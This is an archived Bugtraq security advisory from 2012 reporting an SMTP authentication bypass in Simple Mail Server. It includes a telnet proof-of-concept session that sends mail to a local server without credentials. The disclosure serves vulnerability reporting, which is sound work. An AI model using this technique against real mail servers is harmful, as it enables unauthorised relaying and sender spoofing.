lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 8 Jan 2012 15:10:00 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: Simple Mail Server - SMTP Authentication Bypass Vulnerability

Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability

Software : Simple Mail Server

Software Version : 2011-12-30

Vendor: http://simplemailsvr.sourceforge.net/

Class:  Origin Validation Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-01-08

Updated: 

CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

Impact : Medium (4 < 6.4 < 8)

Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail without password by using usual tcp client(such as telnet).
And it did not have SMTP authentication contoller.

POC(Remarks: domain alex.com and user alex@...x.com must be exists in configuration for this test case):
>telnet 127.0.0.1 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
MAIL FROM: <alex@...x.com>
250 OK
RCPT TO: <alex@...x.com>
250 OK
Data
354 Start mail input; end with <CRLF>.<CRLF>
From: "alex@...x.com" <alex@...x.com>
To: "alex@...x.com" <alex@...x.com>
Subject: authenticate is not required!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ